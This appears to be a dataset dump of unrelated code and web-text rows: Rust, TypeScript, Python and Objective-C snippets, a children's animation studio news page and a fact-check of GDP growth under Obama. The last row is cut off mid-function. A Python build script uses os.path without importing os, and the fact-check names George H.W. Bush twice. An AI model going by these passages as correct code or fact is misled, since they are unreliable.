content
stringlengths 10
4.9M
|
---|
//ip Quaternion<F> for QArray
impl<F, V3, V4> Quaternion<F, V3, V4> for QArray<F, V3, V4>
where
F: Float,
V3: Vector<F, 3>,
V4: Vector<F, 4>,
{
fn from_array(data: [F; 4]) -> Self {
Self::of_vector(V4::from_array(data))
}
fn as_rijk(&self) -> (F, F, F, F) {
quat::as_rijk(self.data.as_ref())
}
fn of_rijk(r: F, i: F, j: F, k: F) -> Self {
Self::from_array(quat::of_rijk(r, i, j, k))
}
fn unit() -> Self {
Self::of_rijk(F::one(), F::zero(), F::zero(), F::zero())
}
fn set_zero(&mut self) {
self.data.set_zero();
}
fn mix(&self, other: &Self, t: F) -> Self {
Self::of_vector(self.data.mix(&other.data, t))
}
fn dot(&self, other: &Self) -> F {
vector::dot(self.as_ref(), other.as_ref())
}
//fp of_rotation3
/// Find the quaternion of a Matrix3 assuming it is purely a rotation
fn of_rotation3<M>(rotation: &M) -> Self
where
M: SqMatrix<V3, F, 3, 9>,
{
Self::from_array(quat::of_rotation(rotation.as_ref()))
}
fn set_rotation3<M>(&self, matrix: &mut M)
where
M: SqMatrix<V3, F, 3, 9>,
{
quat::to_rotation3(self.as_ref(), matrix.as_mut())
}
fn set_rotation4<M>(&self, matrix: &mut M)
where
M: SqMatrix<V4, F, 4, 16>,
{
quat::to_rotation4(self.as_ref(), matrix.as_mut())
}
} |
import React, { useContext } from "react";
import InputTextField from "../../controls/InputTextField";
import { IPropsOrder } from ".";
import { updateAllOrder } from "../../../store/actions/currentOrderActions";
import { CurrentOrderContext } from "../../../store/contexts/CurrentOrderContext";
export default function CustomerForm({ order }: IPropsOrder) {
const { customerNew } = order;
const { dispatch } = useContext(CurrentOrderContext);
const onChange = (e: any) => {
let copyCustomer = customerNew;
copyCustomer = {
...copyCustomer,
[e.target.name]: e.target.value,
};
updateAllOrder({ ...order, customerNew: copyCustomer }, dispatch, true);
};
return (
<div>
<InputTextField
value={customerNew.fullName}
onChange={onChange}
containerClass="mb-3"
id="customername"
name="fullName"
placeholder="Full name"
/>
<InputTextField
onChange={onChange}
value={customerNew.email}
containerClass="mb-3"
id="customeremail"
name="email"
placeholder="Email"
/>
<div className="display-flex">
<InputTextField
onChange={onChange}
value={customerNew.idNumber}
containerClass="mb-3 mr-2 w-100"
id="customeridnumber"
name="idNumber"
placeholder="ID"
/>
<InputTextField
onChange={onChange}
value={customerNew.phoneNumber}
containerClass="mb-3 w-100"
id="customerphone"
name="phoneNumber"
placeholder="Phone number"
/>
</div>
<InputTextField
onChange={onChange}
value={customerNew.address}
containerClass="mb-3"
id="customeraddress"
name="address"
placeholder="Address"
/>
</div>
);
}
|
// EFFECTS: adds to shippingPackages if there is enough space
private void addToShipping(Package p) {
int currentCap = storage.size() + shippingPackages.size();
if (currentCap < MAX_CAPACITY) {
shippingPackages.add(p);
}
} |
def issueunique(self, root_name, asset_tags, ipfs_hashes=None, to_address="", change_address=""):
asset_tags_str = [str(x) for x in asset_tags]
r = self._call('issueunique', str(root_name), asset_tags_str, ipfs_hashes, str(to_address), str(change_address))
txid = r[0]
return lx(txid) |
@import redecl_merge_top;
@class A;
@class A;
@interface B
+ (B*) create_a_B;
@end
@class A;
@protocol P1;
@protocol P2
- (void)protoMethod2;
@end
struct S1;
struct S2 {
int field;
};
struct S1 *produce_S1(void);
void consume_S2(struct S2*);
// Test declarations in different modules with no common initial
// declaration.
@class C;
void accept_a_C(C*);
@class C2;
void accept_a_C2(C2*);
@class C3;
void accept_a_C3(C3*);
@class C3;
@class C4;
@class Explicit;
int *explicit_func(void);
struct explicit_struct;
@protocol P3, P4;
@protocol P3;
struct S3;
struct S3;
struct S4 {
int field;
};
struct S3 *produce_S3(void);
void consume_S4(struct S4*);
typedef int T1;
typedef float T2;
int func0(int);
int func1(int x) { return x; }
int func2(int);
// Spacing matters!
extern int var1;
extern float var2;
extern double var3;
// Make sure this doesn't introduce an ambiguity-creating 'id' at the
// top level.
typedef void funcptr_with_id(int id);
// A class that is declared in the 'bottom' module, then loaded from
// one of the modules it depends on.
@interface DeclaredThenLoaded
- declaredThenLoadedMethod;
@end
@class DeclaredThenLoaded;
void eventually_noreturn2(void);
|
class AESCipher:
"""
A wrapper around the true python AESCipher.
This wrapper takes care of properly padding messages, selection an encryption mode and handling the encryption key.
It is safe to keep one object because the internal python cipher is not reused.
"""
def __init__(self, key: str):
"""
:param key: The passphrase used to encrypt and decrypt messages.
If it is None, no encryption/decryption takes place
"""
if key is not None and len(key) == 0:
key = None
if key is None:
self.key = None
else:
# hash the key so that it has a fixed length and is urlsafe as required by the Fernet cipher
key = PBKDF2HMAC(
algorithm=SHA256(),
length=32,
salt=b"bit-bots",
iterations=10000
).derive(bytes(key, encoding="UTF-8"))
self.key = base64.urlsafe_b64encode(key)
def encrypt(self, message: str) -> bytes:
if message == "":
raise ValueError("Cannot encrypt empty message")
if self.key is None:
return bytes(message, encoding="UTF-8")
return Fernet(key=self.key).encrypt(bytes(message, encoding="UTF-8"))
def decrypt(self, enc: bytes) -> str:
if len(enc) == 0:
raise ValueError("Cannot decrypt empty data")
if self.key is None:
return str(enc, encoding="UTF-8")
return str(Fernet(key=self.key).decrypt(enc), encoding="UTF-8") |
<filename>src/global.d.ts
/**
* Define global variable for fscripts in src folder.
* You can defint your own interface.
* Below is an example of how to call in React component:
* @example
* const { example } = window;
* example.foo.bar(...);
* example.ping();
*/
declare global {
interface Window {
example: IExample;
electron: IElectron;
}
}
// This is an example interface. You can define your own interface.
export interface IExample {
foo: {
bar: (...args: any[]) => void;
};
ping: () => void;
}
// This is an interface for electron.ipcRenderer
export interface IElectron {
ipcRenderer: {
/**
* Add a listener that listens to a channel.
* @param channel The channel to listen to.
* @param listener Listener function.
* @returns A function that removes the listener when called.
*/
on: (channel: string, listener: (...args: any[]) => void) => () => void;
/**
* Add a listener that listens to a channel. Only trigger once.
* @param channel The channel to listen to.
* @param listener Listener function.
* @returns A function that removes the listener when called.
*/
once: (channel: string, listener: (...args: any[]) => void) => () => void;
/**
* Sends args to main process via ipcRenderer.send()
* @param channel
* @param args
*/
send: (channel: string, ...args: any[]) => void;
/**
* Sends args to main process via ipcRenderer.invoke()
* @param channel
* @param args
* @returns A promise.
*/
invoke: (channel: string, ...args: any[]) => Promise<any>;
};
}
|
/**
* Unit test running on device or emulator.
* Created by keisuke on 16/03/03.
*/
@RunWith(AndroidJUnit4.class)
public class PackageNameManagerTest {
private Context context;
@Before
public void setUp() {
context = InstrumentationRegistry.getContext();
}
@Test
public void getPackageName_IsCorrect() {
assertEquals("io.github.kobakei.androidhowtotest.test", PackageNameManager.getPackageName(context));
}
} |
<filename>config.py
GameName = 'chess'
GUI_ENABLE = True
# -- path
mct_simulate_num = 20
epsilon = 0.2
cpuct = 0.1 # mct cpuct
memory_size = 500
batch_size = 50
train_loop = 2
epochs = 3
# init_chess_state = [
# [0, -1, 0],
# [-1, 0, 1],
# [0, 1, 0]
# ]
# question_state = [
# [0, -1, 0],
# [2, 1, 2],
# [-1, 1, 0]
# ]
init_chess_state = [
[0, -1, 0, 0],
[-1, 0, 0, 1],
[0, 0, 1, 0]
]
# init_chess_state = [
# [0, -1, 0, 0],
# [-1, 0, 0, 0],
# [0, 0, 0, 1],
# [0, 0, 1, 0]
# ]
# board_rows=6
# board_cols=6
# init_chess_state=[
# [0, 0, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0],
# [-1, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 1],
# [0, 0, 0, 0, 0, 0],
# [0, 0, 1, 0, 0, 0]
# ]
board_rows = len(init_chess_state)
board_cols = len(init_chess_state[0])
pick_piece_thrs = board_rows * board_cols * 8
|
Spring/Summer 2018 Spring/Summer 2018 *WOOT!* Huge congrats and thanks to the Octo-crew - the Octonauts won an ANNIE for "Best Animated Television/Broadcast Production For Preschool Children" and an EMMY for "Outstanding Writing in a Preschool Animated Program" ~ We're currently busy working on more fun underwater adventures. Stay tuned! Winter 2017/18
We've also been working on a project close to our hearts: "The Toughlings" for the Floating Hospital for Children in Boston. We created art for hospital walls, an activity book, web and more.
Happy 10th book birthday to "Sea of Shade"! We're excited that the first four original Octonauts books are now available in a lovely new box set. Season 4 of Octonauts TV is airing world wide and the octo-verse continues to expand into themed hotel rooms, play centers, live musical theatre and more fun toys. Octonauts books are now available in Korean, while Hungarian and Chinese books are coming out in 2018. Woot!We've also been working on a project close to our hearts: "The Toughlings" for the Floating Hospital for Children in Boston. We created art for hospital walls, an activity book, web and more. See some images in our portfolio!
Currently in its 4th season and airing world wide, follow the The Octonauts animated TV series follows our crew of intrepid explorers as they adventure under the ocean!Currently in its 4th season and airing world wide, follow the Octonauts facebook or Twitter for news. |
import { CourierState } from "../utils/data_parsers";
import { NotificationType } from "../utils/util";
import { NewSubscription } from "./new_subscription";
import { Pull } from "./pull";
import { SubscriptionsTable } from "./subscriptions_table";
interface Props {
courierState: CourierState;
setNotification: (type: NotificationType, message: string) => void;
setDeleteConfirmation: (message: string, action: () => void) => void;
}
export function SubscriptionsTab(props: Props) {
return (
<div>
<section class="section">
<div class="container">
<div class="columns">
<div class="column">
<NewSubscription setNotification={props.setNotification} />
</div>
<div class="column">
<Pull setNotification={props.setNotification} />
</div>
</div>
</div>
</section>
<section class="section">
<div class="container">
<SubscriptionsTable
subscriptions={Array.from(props.courierState.subscriptionMap.values())}
setNotification={props.setNotification}
setDeleteConfirmation={props.setDeleteConfirmation}
/>
</div>
</section>
</div>
);
}
|
<gh_stars>1-10
import React, { useEffect, useState } from 'react';
import { connect, ConnectedProps } from 'react-redux';
import { useHistory } from 'react-router';
import { Button, Popover, ButtonBase, makeStyles, Theme, createStyles } from '@material-ui/core';
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
import { useTranslation } from 'react-i18next';
import { AppState } from '../App/reducers';
import { logoutAction } from '../ducks/auth';
import { getUser } from '../services/api/user';
const useStyles = makeStyles((theme: Theme) =>
createStyles({
root: {
display: 'flex',
flexDirection: 'column',
},
content: {
flexGrow: 1,
display: 'flex',
flexDirection: 'column',
},
header: {
marginTop: theme.spacing(2),
display: 'flex',
flexDirection: 'column',
justifyContent: 'space-around',
alignItems: 'center',
width: '100%',
},
usericon: {
color: theme.palette.primary.main,
},
username: {
color: theme.palette.primary.main,
fontSize: '1.2em',
margin: theme.spacing(1),
},
logoutbutton: {
margin: theme.spacing(1),
},
}));
const mapState = (state: AppState) => ({
user: state.auth.user,
});
const mapDispatch = ({
logout: logoutAction,
});
const connector = connect(mapState, mapDispatch);
type ReduxProps = ConnectedProps<typeof connector>;
type PropTypes = ReduxProps;
const UserBadge = (props: PropTypes) => {
const { user, logout } = props;
const [t] = useTranslation();
const classes = useStyles();
const [anchorEl, setAnchorEl] = useState<HTMLButtonElement | null>(null);
const [userName, setUserName] = useState<string>('');
const history = useHistory();
const handleClick = (event: React.MouseEvent<HTMLButtonElement>) => {
setAnchorEl(event.currentTarget);
};
const handleClose = () => {
setAnchorEl(null);
};
const settings = () => {
// On renvoi vers la route /usersettings
history.push('/usersettings');
// On ferme la fenêtre de menu
handleClose();
};
useEffect(() => {
const init = async () => {
if (user) {
const respUser = await getUser(user.id);
setUserName(respUser.name);
}
};
init();
return () => {
setUserName('');
};
}, [user]);
const open = Boolean(anchorEl);
if (!user) {
return <div />;
}
return (
<>
<ButtonBase onClick={handleClick}>
<FontAwesomeIcon size="2x" icon="user" />
</ButtonBase>
<Popover
id="user-badge-content"
open={open}
anchorEl={anchorEl}
onClose={handleClose}
anchorOrigin={{
vertical: 'bottom',
horizontal: 'center',
}}
transformOrigin={{
vertical: 'top',
horizontal: 'center',
}}
>
<div className={classes.root}>
<div className={classes.content}>
<div className={classes.header}>
<FontAwesomeIcon className={classes.usericon} icon="user-circle" size="3x" />
<div className={classes.username}>{userName}</div>
</div>
</div>
<Button className={classes.logoutbutton} onClick={settings} variant="contained" color="primary">
{t('main:settings')}
</Button>
<Button className={classes.logoutbutton} onClick={logout} variant="contained" color="primary">
{t('main:logout')}
</Button>
</div>
</Popover>
</>
);
};
export default connector(UserBadge);
|
"The past (Obama) administration was the first administration that never had a whole year of 3 percent growth."
Speaking at an event in Chicago earlier this month, U.S. Rep. Peter Roskam, R-Ill., was talking tax policy and the economy when he pointed to lackluster economic growth that occurred under former President Barack Obama.
"The past (Obama) administration was the first administration that never had a whole year of 3 percent growth," Roskam said during a March 6 speech at the City Club of Chicago.
It’s an oft-cited figure Republicans tend to throw around to highlight the weak economic recovery throughout Obama’s presidency, but does the data back it up?
A familiar claim
Roskam’s claim lacks some specifics, particularly the type of growth and time frame he was referring to in his speech.
David Pasch, the Wheaton Republican’s communications director, provided a link to data compiled by the Bureau of Economic Analysis showing both the annual and quarterly percentage change in real gross domestic product, or GDP, which is the total value of goods and services provided in the country.
While annual figures on GDP growth date back to the Herbert Hoover administration and the onset of the Great Depression in 1929, the federal government did not start tracking quarterly growth until 1947.
Considering the time frame for which this annual data is available, it’s safe to assume Roskam was referring to economic growth since the Hoover administration.
In fact, Roskam’s claim is quite similar to a statement Donald Trump made during a campaign speech in October, which was fact-checked by our colleague Joshua Gillin at PolitiFact Florida.
As was the case with Trump’s claim, Roskam is right when he says that year-over-year GDP growth never topped 3 percent while Obama was in office.
But as Princeton University economist Alan Blinder told PolitiFact at the time, looking at annual data can be misleading because it doesn’t provide context or account for historical factors that affect economic growth, such as recessions and global crises. For example, Hoover came into office on the cusp of the Great Depression, and Obama took over during the tail end of the Great Recession and amid instability in the Middle East.
That’s one of the main reasons why economists suggest looking at the percentage change in GDP by quarters, rather than growth in a single calendar year.
When PolitiFact Florida fact-checked Trump saying Obama was the first president "in modern history not to have a single year of 3 percent growth," data for the third and fourth quarters of 2016 was not yet available.
But now it is.
GDP growth in 2016 and the Obama years
According to the Bureau of Economic Analysis, the percentage change in GDP growth during the third and fourth quarters of the last year of Obama’s final term was 3.5 percent and 1.9 percent, respectively, resulting in an average growth rate of 1.6 percent for 2016.
That was down 1 percentage point from 2015 when GDP grew by 2.6 percent, which marked the best year for average growth under Obama.
Typically, economic growth in the first quarter of a new presidency is attributed to the previous administration, meaning former President George W. Bush gets credit for the 5.4 percent contraction in the economy during the first three months of 2009.
As for the remainder of Obama’s time in office, quarterly GDP growth averaged 2.0 percent, or 1.5 percent when averaging out annual figures.
But if the data is used to compare one quarter to the same quarter from a year ago, there were two periods during Obama’s tenure in which growth exceeded 3 percent. Between the third quarters of 2009 and 2010, GDP growth was about 3.1 percent; and between the first quarters of 2014 and 2015, the economy grew by 3.3 percent, according to the Bureau of Economic Analysis.
With the way Roskam refers to growth, however, Obama indeed was the first president who did not achieve more than 3 percent growth in GDP. Average growth under Bush Sr., was 2.1 percent; 3.9 percent for Bill Clinton; 2.3 percent for George H.W. Bush; and 3.5 percent for Ronald Reagan.
The highest annual growth on record occurred in 1942 during the Franklin D. Roosevelt administration, when GDP grew by a staggering 18.9 percent as the United States entered World War II and ramped up production following the Dec. 7, 1941, attack on Pearl Harbor.
Our ruling
Roskam said the Obama "administration was the first administration that never had a whole year of 3 percent growth."
While Roskam’s claim is accurate when based on annual GDP growth figures between 2009 and 2016, there are other ways to look at the data, such as from one quarter to the same in the previous year. Doing so reveals economic growth has surpassed 3 percent during two periods of Obama’s presidency.
We rate Roskam’s claim Mostly True. |
/// In SnapshotManager's new function we create a new snapshop manager by
/// parsing the /proc/id/maps of the process id in question.
pub fn new(pid: i32) -> SnapshotManager {
// form the absolute path to the process maps
let mappath = format!("/proc/{}/maps",pid);
// read the maps contents of the process
let map = read_to_string(&mappath).unwrap();
// lets keep a holding area for all the snapshot structs
let mut memspaces: Vec<Snapshot> = Vec::new();
// We have the maps contents of the process in a string, lets parse it
// First we go line by line
for line in map.lines() {
// Then for each line lets collect all the columns
let columns: Vec<&str> = line.split_whitespace().collect();
// Next we parse each column into their respective variables
let startendaddrs: Vec<&str> = columns[0].split("-").collect();
let startaddr: u64 = u64::from_str_radix(startendaddrs[0],16).expect("Issue parsing map start address");
let endaddr: u64 = u64::from_str_radix(startendaddrs[1],16).expect("Issue parsing map end address");
let permissions = columns[1];
let offset: u64 = u64::from_str_radix(columns[2],16).expect("Issue parsing map offset");
let device = columns[3];
let inode: u32 = columns[4].parse().expect("Issue parsing map inode");
let name = if columns.len() < 6 {
""
} else {
columns[5]
};
// Lastly we create a new Snapshot struct with all our attribute we parsed for this memory region
let snap = Snapshot {
pid: pid,
startaddr: startaddr,
endaddr: endaddr,
size: (endaddr-startaddr) as usize,
permissions: permissions.to_string(),
offset: offset,
device: device.to_string(),
inode: inode,
name: name.to_string(),
localsave: Vec::new(),
writable: true,
};
// We keep a growing pool of these Snapshot structs
memspaces.push(snap);
}
// Lastly we return the SnapshotManager
SnapshotManager {
pid: pid,
memspaces: memspaces,
regs: ptrace::getregs(Pid::from_raw(pid)).unwrap()
}
} |
import pytest
cands = [
# https://github.com/podhmo/python-node-semver/issues/5
["<=1.2", "1.2.0", ["1.1.1", "1.2.0-pre", "1.2.0", "1.1.1-111", "1.1.1-21"]],
["<=1.2", "1.2", ["1.1.1", "1.2.0-pre", "1.2", "1.1.1-111", "1.1.1-21"]],
["<=1.2.0", "1.2.0", ["1.1.1", "1.2.0-pre", "1.2.0", "1.1.1-111", "1.1.1-21"]],
["<=1.2.0", "1.2", ["1.1.1", "1.2.0-pre", "1.2", "1.1.1-111", "1.1.1-21"]],
]
@pytest.mark.parametrize("op, wanted, cands", cands)
def test_it(op, wanted, cands):
from nodesemver import max_satisfying
got = max_satisfying(cands, op, loose=True)
assert got == wanted
|
<gh_stars>1-10
#ifndef _OPTION_H
#define _OPTION_H
#include <iostream>
using namespace std;
template <class G_Type>
class COptionMap
{
public:
COptionMap();
~COptionMap();
void InsertOptMap(std::string strOpt, const G_Type item);
void GetOptMap(std::string strOpt, G_Type &item);
private:
std::map<std::string, G_Type> optmap_;
};
template <class G_Type>
COptionMap<G_Type>::COptionMap()
{
}
template <class G_Type>
COptionMap<G_Type>::~COptionMap()
{
}
template <class G_Type>
void COptionMap<G_Type>::InsertOptMap(std::string strOpt, const G_Type item)
{
pair<std::string, G_Type>abc(strOpt, item);
optmap_.insert(abc);
}
template <class G_Type>
void COptionMap<G_Type>::GetOptMap(std::string strOpt, G_Type &item)
{
std::map<std::string, G_Type>::iterator it;
it = optmap_.find(strOpt);
if (it != optmap_.end())
{
item = it->second;
//cout << it->second << endl;
}
}
#endif // !_OPTION_H
|
use std::convert::TryFrom;
use fujiformer_geom::{IntRect, Point, Rect, Size};
use log::warn;
use thiserror::Error;
use crate::{internal::Node, CelesteMap};
#[derive(Debug, Clone)]
pub struct Screen {
name: String,
rect: IntRect,
unread: Node,
}
impl Screen {
pub fn new(name: String, rect: IntRect) -> Self {
Screen {
name,
rect,
unread: Node::new("level".into()),
}
}
pub fn shape(&self) -> IntRect {
self.rect
}
pub fn shape_mut(&mut self) -> &mut IntRect {
&mut self.rect
}
}
#[derive(Error, Debug)]
pub enum ScreensDecodeError {
#[error("missing levels node")]
MissingLevelsNode,
#[error("level missing name")]
MissingName,
#[error("level name not int")]
NameNotString,
#[error("level missing x value")]
MissingX,
#[error("level x value not int")]
XNotInt,
#[error("level missing y value")]
MissingY,
#[error("level y value not int")]
YNotInt,
#[error("level missing width value")]
MissingWidth,
#[error("level width not int")]
WidthNotInt,
#[error("level missing height value")]
MissingHeight,
#[error("level height not int")]
HeightNotInt,
}
pub fn decode_screens(map: &mut CelesteMap) -> Result<(), ScreensDecodeError> {
let mut node = map
.unread
.take_child_with_name("levels")
.ok_or(ScreensDecodeError::MissingLevelsNode)?;
for mut child in std::mem::take(node.children_mut()).into_iter() {
if child.name() != "level" {
warn!("expected \"rect\", got {}", child.name());
}
let (mut name, mut x, mut y, mut width, mut height) = (None, None, None, None, None);
child.properties_mut().retain(|(key, value)| {
match key.as_str() {
"name" => {
name = Some(
String::try_from(value.clone())
.map_err(|_| ScreensDecodeError::NameNotString),
)
}
"x" => x = Some(i32::try_from(value).map_err(|_| ScreensDecodeError::XNotInt)),
"y" => y = Some(i32::try_from(value).map_err(|_| ScreensDecodeError::YNotInt)),
"width" => {
width = Some(u32::try_from(value).map_err(|_| ScreensDecodeError::WidthNotInt))
}
"height" => {
height =
Some(u32::try_from(value).map_err(|_| ScreensDecodeError::HeightNotInt))
}
_ => return true,
};
false
});
let (name, x, y, width, height) = (
name.ok_or(ScreensDecodeError::MissingName)??,
x.ok_or(ScreensDecodeError::MissingX)??,
y.ok_or(ScreensDecodeError::MissingY)??,
width.ok_or(ScreensDecodeError::MissingWidth)??,
height.ok_or(ScreensDecodeError::MissingHeight)??,
);
map.screens_mut().push({
let mut screen =
Screen::new(name, Rect::new(Point::new(x, y), Size::new(width, height)));
screen.unread = child;
screen
});
}
Ok(())
}
|
// TagSet (leaf): Use the referenced tag-set to set tags on the prefixes that match the
// specified conditions. When a tag is set it MUST be possible to match the
// value set in subsequent policies on the local device. where the protocol that
// is carrying the prefix has a tag field (OSPF, and IS-IS for in particular)
// the tag MUST be set in the corresponding protocol advertisements of the
// prefix.
// ----------------------------------------
// Defining module: "openconfig-routing-policy"
// Instantiating module: "openconfig-routing-policy"
// Path from parent: "state/tag-set"
// Path from root: "/routing-policy/policy-definitions/policy-definition/statements/statement/actions/set-tag/reference/state/tag-set"
func (n *RoutingPolicy_PolicyDefinition_Statement_Actions_SetTag_ReferencePath) TagSet() *RoutingPolicy_PolicyDefinition_Statement_Actions_SetTag_Reference_TagSetPath {
return &RoutingPolicy_PolicyDefinition_Statement_Actions_SetTag_Reference_TagSetPath{
NodePath: ygot.NewNodePath(
[]string{"state", "tag-set"},
map[string]interface{}{},
n,
),
}
} |
#!/usr/bin/env python3
from os import listdir
from os.path import isfile, join
from subprocess import call
import sys
need_rebuild = False
def update_workspace():
try:
call(['bash', '-c', 'cd gir && cargo build --release'])
except:
return False
return True
if not isfile('./gir/src'):
need_rebuild = True
print('=> Initializing gir submodule...')
call(['bash', '-c', 'git submodule update --init'])
print('<= Done!')
question = 'Do you want to update gir submodule? [y/N] '
if sys.version_info[0] < 3:
line = raw_input(question)
else:
line = input(question)
line = line.strip()
if line.lower() == 'y':
need_rebuild = True
print('=> Updating gir submodule...')
call(['bash', '-c', 'cd gir && git reset --hard HEAD && git pull -f origin master'])
print('<= Done!')
if need_rebuild is True or not os.path.isfile('./gir/target/release/gir'):
print('=> Building gir...')
if update_workspace() is True:
print('<= Done!')
else:
print('<= Failed...')
sys.exit(1)
print('=> Regenerating crates...')
for entry in [f for f in listdir('.') if isfile(join('.', f))]:
if entry.startswith('Gir_Gst') and entry.endswith('.toml'):
print('==> Regenerating "{}"...'.format(entry))
try:
call(['./gir/target/release/gir', '-c', entry])
except Exception as err:
print('The following error occurred: {}'.format(err))
line = input('Do you want to continue? [y/N] ').strip().lower()
if line != 'y':
sys.exit(1)
print('<== Done!')
call(['cargo', 'fmt'])
print('<= Done!')
print("Don't forget to check if everything has been correctly generated!")
|
/**
* Implementation based on the Raml 1.0 Parser
*
* @author Aleksandar Stojsavljevic
* @since 0.10.0
*/
public class RJP10V2RamlSecurityReference implements RamlSecurityReference {
private final SecuritySchemeRef securitySchemeRef;
public RJP10V2RamlSecurityReference(SecuritySchemeRef securityReferenceRef) {
this.securitySchemeRef = securityReferenceRef;
}
@Override
public String getName() {
if (this.securitySchemeRef == null) {
return null;
}
return this.securitySchemeRef.name();
}
public SecuritySchemeRef getSecuritySchemeRef() {
return this.securitySchemeRef;
}
@Override
public List<String> getAuthorizationGrants() {
if (!"oauth_2_0".equalsIgnoreCase(getName())) {
return Collections.emptyList();
}
TypeInstance structuredValue = this.securitySchemeRef.structuredValue();
if (structuredValue == null) {
return Collections.emptyList();
}
List<String> authorizationGrants = new ArrayList<>();
List<TypeInstanceProperty> properties = structuredValue.properties();
for (TypeInstanceProperty property : properties) {
if ("authorizationGrants".equalsIgnoreCase(property.name())) {
authorizationGrants.add(property.value().value().toString());
}
}
return authorizationGrants;
}
} |
<reponame>vasanthrajd/rajehs-vasanth<filename>src/main/java/com/careerin/api/dto/RefreshTokenDto.java
package com.careerin.api.dto;
import lombok.Getter;
import lombok.Setter;
import java.io.Serializable;
@Getter
@Setter
public class RefreshTokenDto implements Serializable {
private static final long serialVersionUID = 9052178978317125554L;
private String refreshToken;
}
|
Geek & Sundry teamed up with Nerdist to brings Vin Diesel's dream of an awesome Dungeons & Dragons session to life. Laura Bailey, Matt Mercer and Travis Willingham from Critical Role joined forces with Vin Diesel and minds from the Nerdist to film a special session...
You can watch the session above where Vin's own Witch Hunter class joins forces with his companions to try and find out the route of a terrible blight in a small township. See how they manage to take on threats and 'knock' their way into a world of adventure.
It's great to see Vin having fun with some old school tabletop role-playing again. He used to play when he was younger as a Half-Orc Barbarian. Whether or not he gets much time to play regularly nowadays when he's a Hollywood big shot; here's hoping he makes time now.
What do you think? |
Mycophenolic Acid in Silage
ABSTRACT We examined 233 silage samples and found that molds were present in 206 samples with counts between 1 × 103 and 8.9 × 107 (mean, 4.7 × 106) CFU/g. Mycophenolic acid, a metabolite of Penicillium roqueforti, was detected by liquid chromatography-mass spectrometry in 74 (32%) of these samples at levels ranging from 20 to 35,000 (mean, 1,400) μg/kg. This compound has well-known immunosuppressive properties, so feeding with contaminated silage may promote the development of infectious diseases in livestock. |
<filename>minecraft/net/minecraft/client/AnvilConverterException.java
package net.minecraft.client;
public class AnvilConverterException extends Exception {
public AnvilConverterException(String exceptionMessage) {
super(exceptionMessage);
}
}
|
Building Collaboration: A Scoping Review of Cultural Competency and Safety Education and Training for Healthcare Students and Professionals in Canada
ABSTRACT Phenomenon: This scoping literature review summarizes current Canadian health science education and training aimed to lessen health gaps between Aboriginal and non-Aboriginal peoples. Approach: Keyword searches of peer-reviewed and gray literature databases, websites, and resources recommended by local Aboriginal community members identified 1,754 resources. Using specific inclusion and exclusion criteria, 26 resources relevant to education and training of healthcare professionals and students in Canada were selected. Information included self-assessment for cultural competency/safety skills, advocacy within Canadian healthcare, and descriptions of current programs and training approaches. Findings: In spite of increasing awareness and use of cultural competency and safety concepts, few programs have been successfully implemented. Insights: A concerted effort among health science education and training bodies to develop integrated and effective programs could result in comprehensive processes that hasten the Canadian culturally safe healthcare provision, thus reducing the gaps among populations. |
#include <stdio.h>
#include <stdlib.io>
#include <string.h>
#include <avr/io.h>
#include <avr/interrupt.h>
#include <avr/wdt.h>
uint16_t pec15_calc(uint8_t len, //Number of bytes that will be used to calculate a PEC
uint8_t *data //Array of data that will be used to calculate a PEC
);
|
<reponame>ramarag/cosmos-explorer
import postRobot from "post-robot";
export interface IGitHubConnectorParams {
state: string;
code: string;
}
export const GitHubConnectorMsgType = "GitHubConnectorMsgType";
window.addEventListener("load", async () => {
const openerWindow = window.opener;
if (openerWindow) {
const params = new URLSearchParams(document.location.search);
await postRobot.send(
openerWindow,
GitHubConnectorMsgType,
{
state: params.get("state"),
code: params.get("code"),
} as IGitHubConnectorParams,
{
domain: window.location.origin,
}
);
window.close();
}
});
|
/**
* Dispense the specified stack, play the dispense sound and spawn particles.
*/
protected ItemStack dispenseStack(IBlockSource source, ItemStack stack) {
BlockPos blockpos = source.getBlockPos().offset(source.getBlockState().get(DispenserBlock.FACING));
for(AbstractHorseEntity abstracthorseentity : source.getWorld().getEntitiesWithinAABB(AbstractHorseEntity.class, new AxisAlignedBB(blockpos), (p_239790_0_) -> {
return p_239790_0_.isAlive() && p_239790_0_.func_230276_fq_();
})) {
if (abstracthorseentity.isArmor(stack) && !abstracthorseentity.func_230277_fr_() && abstracthorseentity.isTame()) {
abstracthorseentity.replaceItemInInventory(401, stack.split(1));
this.func_239796_a_(true);
return stack;
}
}
return super.dispenseStack(source, stack);
} |
// Advances a new line in the decoder
// And calls the next stateFunc
// checks if next line is continuation line
func (d *decoder) next() {
if d.buffered == "" {
res := d.scanner.Scan()
if true != res {
d.err = d.scanner.Err()
return
}
d.line++
d.current = d.scanner.Text()
} else {
d.current = d.buffered
d.buffered = ""
}
for d.scanner.Scan() {
d.line++
line := d.scanner.Text()
if strings.HasPrefix(line, " ") || strings.HasPrefix(line, "\t") {
d.current = d.current + line[1:]
} else {
d.buffered = line
break
}
}
d.err = d.scanner.Err()
if d.nextFn != nil {
d.nextFn(d)
}
} |
/**
* Called when the screen is unloaded. Used to disable keyboard repeat events
*/
public void onGuiClosed()
{
Keyboard.enableRepeatEvents(false);
NetClientHandler netclienthandler = this.mc.getNetHandler();
if (netclienthandler != null)
{
ByteArrayOutputStream streambyte = new ByteArrayOutputStream();
DataOutputStream stream = new DataOutputStream(streambyte);
try
{
stream.writeInt(te.xCoord);
stream.writeInt(te.yCoord);
stream.writeInt(te.zCoord);
stream.writeBoolean(te.lastAdded == 1);
stream.writeUTF(fakeSign.signText[0]);
stream.writeUTF(fakeSign.signText[1]);
stream.writeUTF(fakeSign.signText[2]);
stream.writeUTF(fakeSign.signText[3]);
stream.close();
streambyte.close();
PacketDispatcher.sendPacketToServer(PacketDispatcher.getPacket(CHANNEL_SIGN_UPDATE, streambyte.toByteArray()));
}
catch (Exception e)
{
e.printStackTrace();
}
}
} |
<reponame>y1j2x34/rikoltilo
import { Shortcut } from '@vgerbot/shortcuts';
import { Observable } from 'rxjs';
export function shortcut(shortcutKey: string) {
const shortcutMatcher = Shortcut.from(shortcutKey);
return function shortcutOperatorFunction<T>(source: Observable<T>) {
return new Observable<T>(subscriber => {
return source.subscribe(
event => {
if (
event instanceof KeyboardEvent &&
shortcutMatcher.match(event)
) {
subscriber.next(event);
}
},
err => subscriber.error(err),
() => subscriber.complete()
);
});
};
}
|
def _two_intersections_for_outer(self, center, radius, points):
remains = (
Arch.from_points(center, points[0], points[1], radius, False),
